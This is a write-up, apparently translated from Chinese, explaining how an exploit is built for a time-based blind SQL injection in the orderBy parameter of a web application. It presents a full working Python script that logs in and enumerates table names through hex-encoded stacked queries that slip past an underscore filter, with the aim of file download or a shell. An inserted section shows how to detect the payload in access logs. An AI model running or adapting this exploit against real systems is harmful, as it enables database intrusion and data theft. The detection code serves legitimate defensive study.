Preface
The root cause of the vulnerability was explained earlier; this part describes how the exp is written.
Main text
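To get a shell or to download arbitrary files, we need to modify the `<prefix>sys_file` table in the database, so the exploitation approach is as follows:
- Use the SQL injection to obtain the name of any one table in the application's database, which gives the prefix `pre`.
- Then insert the target path into `presys_file`.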
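In MySQL 5, `information_schema` can be used to list the tables of a given database.
The `tables` table in `information_schema` holds information about every table stored in the whole MySQL instance: `table_schema` is the database the table belongs to, and `table_name` is the table name.
So the query

```sql
SELECT table_name FROM information_schema.tables where table_schema=database()
```

returns the names of all tables in the current database (`database()` returns the name of the current database).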
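Because nothing is echoed back, a function that evaluates a condition is needed; here I use `if`:

```sql
select if(ASCII(SUBSTR((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1) ,1 ,1))=16, SLEEP(3), 1)
```

If the first argument of `if` is 1, it returns the value of the second argument; otherwise it returns the value of the third argument.
The statement above uses a subquery together with `ascii` and `substr` to enumerate the retrieved result by its ASCII value; when the guess matches, it runs `sleep(3)`.
By measuring the server's response time we can determine the value at the position currently being enumerated.
The subquery is only allowed to return one row, so `limit 0,1` is used to return only the first result.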
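The key code for enumerating the table name is as follows:

```python
# Excerpt from the full exp below: table_len, host, target, headers and
# cookies are defined there.
table_name = ""
for i in range(1, table_len + 1):        # position in the table name
    for j in range(1, 129):              # candidate ASCII value
        payload = get_payload_encode(
            '''select if(ASCII(SUBSTR((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1) ,{} ,1))={}, SLEEP(3), 1);'''.format(
                i, j))
        # Baseline: response time of a normal request
        start = time.time()
        requests.get(host)
        nor_time = (time.time() - start)
        # Response time of the request carrying the payload
        start = time.time()
        requests.get(target + payload.decode("utf-8"), headers=headers, cookies=cookies)
        att_time = (time.time() - start)
        if att_time - nor_time > 2:
            table_name += chr(j)
            print(table_name)
            break
```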
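One more thing to note: the application filters `_`. Here a combination of `prepare` and `execute` is used to get around it, because MySQL accepts strings written in hexadecimal.

```python
import base64
import binascii
import json


def get_payload_encode(payload):
    # Hex-encode the statement so that no filtered character appears literally
    sql = "set @query=0x{};prepare stmt from @query;execute stmt;".format(binascii.b2a_hex(payload.encode("utf-8")).decode("utf-8"))
    raw = {"orderBy": "id limit 0,1;{}#".format(sql)}
    raw = json.dumps(raw)
    return base64.b64encode(raw.encode("utf-8"))  # str -> bytes: use encode
```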
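Seen from the defending side, this wrapper is easy to recognise in web logs. The following is an added example, not part of the original post: it decodes the `param` value in the order it was built (base64, then JSON), checks `orderBy` against an allowlist that is an assumption of this example, and decodes hex literals so the hidden statement becomes visible. The helper names and the log lines are constructed.

```python
import base64, json, re
from urllib.parse import unquote
ENDPOINT = "/cash/block-printTradeBlock.html?param="   # path taken from the page
# Assumed allowlist: a single column name with an optional sort direction.
SAFE_ORDER_BY = re.compile(r"[A-Za-z][A-Za-z0-9_]*( (asc|desc))?", re.I)
HEX_LITERAL = re.compile(r"0x((?:[0-9a-fA-F]{2})+)")
MARKERS = (";", "prepare ", "execute ", "sleep(", "information_schema")

def inspect_param(param):
    """Decode a base64/JSON `param` value and classify its orderBy field."""
    try:
        fields = json.loads(base64.b64decode(param, validate=True))
        order_by = str(fields["orderBy"])
    except (ValueError, KeyError, TypeError):
        return {"verdict": "malformed", "reasons": [], "hidden_sql": []}
    if SAFE_ORDER_BY.fullmatch(order_by):
        return {"verdict": "ok", "reasons": [], "hidden_sql": []}
    # Hex literals hide filtered characters such as "_"; decode them for the analyst.
    hidden = [bytes.fromhex(h).decode("utf-8", "replace")
              for h in HEX_LITERAL.findall(order_by)]
    haystack = " ".join([order_by] + hidden).lower()
    reasons = [m.strip() for m in MARKERS if m in haystack]
    return {"verdict": "suspicious", "reasons": reasons, "hidden_sql": hidden}

def scan_access_log(lines):
    """Return (line_number, result) for each endpoint request that is not ok."""
    hits = []
    for n, line in enumerate(lines, 1):
        if ENDPOINT not in line:
            continue
        raw = re.split(r'[\s&"]', line.split(ENDPOINT, 1)[1], maxsplit=1)[0]
        result = inspect_param(unquote(raw))
        if result["verdict"] != "ok":
            hits.append((n, result))
    return hits

def _encode(order_by):          # builds the constructed sample values only
    return base64.b64encode(json.dumps({"orderBy": order_by}).encode()).decode()

# Constructed samples: one normal sort, one with the wrapper shape shown above.
BENIGN = _encode("id desc")
WRAPPED = _encode("id limit 0,1;set @query=0x{};prepare stmt from @query;execute stmt;#"
                  .format(b"select 1".hex()))
SAMPLE_LOG = [
    '10.0.0.5 "GET ' + ENDPOINT + BENIGN + ' HTTP/1.1" 200',
    '10.0.0.9 "GET ' + ENDPOINT + WRAPPED + ' HTTP/1.1" 200',
]

print(scan_access_log(SAMPLE_LOG))
```

The same allowlist check, applied server-side before `orderBy` reaches the query, rejects the stacked statement regardless of how its contents are encoded.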
The final exp:

```python
# coding=utf-8
import requests
import base64
import time
import json
import binascii
import re
import hashlib


def get_md5(text):
    text = text.encode("utf-8")
    m = hashlib.md5()
    m.update(text)
    return m.hexdigest()


def get_payload_encode(payload):
    sql = "set @query=0x{};prepare stmt from @query;execute stmt;".format(binascii.b2a_hex(payload.encode("utf-8")).decode("utf-8"))
    raw = {"orderBy": "id limit 0,1;{}#".format(sql)}
    raw = json.dumps(raw)
    return base64.b64encode(raw.encode("utf-8"))  # str -> bytes: use encode


# get_db_name(host)
def get_table_name(host):
    path = "/cash/block-printTradeBlock.html?param="
    target = host + path
    # Look up the table name: first its length
    table_len = 0
    for i in range(1, 100):
        payload = get_payload_encode(
            '''select if((SELECT LENGTH(table_name)FROM information_schema.tables where table_schema=database() LIMIT 0,1)={}, SLEEP(3), 1);'''.format(
                i))
        start = time.time()
        requests.get(host)
        nor_time = (time.time() - start)
        start = time.time()
        requests.get(target + payload.decode("utf-8"), headers=headers, cookies=cookies)
        att_time = (time.time() - start)
        if att_time - nor_time > 2:
            table_len = i
            break
    print("table_len: %d" % (table_len))
    # Then each character of the name
    table_name = ""
    for i in range(1, table_len + 1):
        for j in range(1, 129):
            payload = get_payload_encode(
                '''select if(ASCII(SUBSTR((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1) ,{} ,1))={}, SLEEP(3), 1);'''.format(
                    i, j))
            start = time.time()
            requests.get(host)
            nor_time = (time.time() - start)
            start = time.time()
            requests.get(target + payload.decode("utf-8"), headers=headers, cookies=cookies)
            att_time = (time.time() - start)
            if att_time - nor_time > 2:
                table_name += chr(j)
                print(table_name)
                break
    return table_name


def login(url, username, password):
    target = url + "/sys/user-login.html"
    data = {"account": "admin", "password": "d4dba0bc2f7e946feaeacbdcdc167131",
            "referer": "http://hack.ranzhi.top/sys/index.html", "rawPassword": "21232f297a57a5a743894a0e4a801fc3",
            "keepLogin": "false"}
    res = requests.get(target, headers=headers)
    cookies['rid'] = res.cookies['rid']
    random = re.findall('v.random = "(.*?)";', res.text)[0]
    # Build the fields the login form expects
    data['account'] = username
    data['referer'] = target
    data['rawPassword'] = get_md5(password)
    data['password'] = get_md5(get_md5(get_md5(password) + username) + random)
    res = requests.post(target, headers=headers, cookies=cookies, data=data)
    if "self.location" in res.content.decode("utf-8"):
        print("登录成功,下面开始 exploit")
    else:
        print("登录失败")
        exit(0)


if __name__ == '__main__':
    # Defined but not passed to any request below
    proxies = {"http": "http://127.0.0.1:8080", "https": "https://127.0.0.1:8080", }
    cookies = {"lang": "zh-cn", "theme": "default", "keepLogin": "false", "rid": "6n6panbh36uqiqj4k5o0nbscq2",
               " XDEBUG_SESSION": "19857"}
    headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade-Insecure-Requests": "1",
               "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36",
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
               "Referer": "http://hack.ranzhi.top/sys/index.php", "Accept-Encoding": "gzip, deflate",
               "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
    host = "http://hack.ranzhi.top:80/"
    # get_table_name(host)
    login(host, "test", "111111")
    get_table_name(host)
```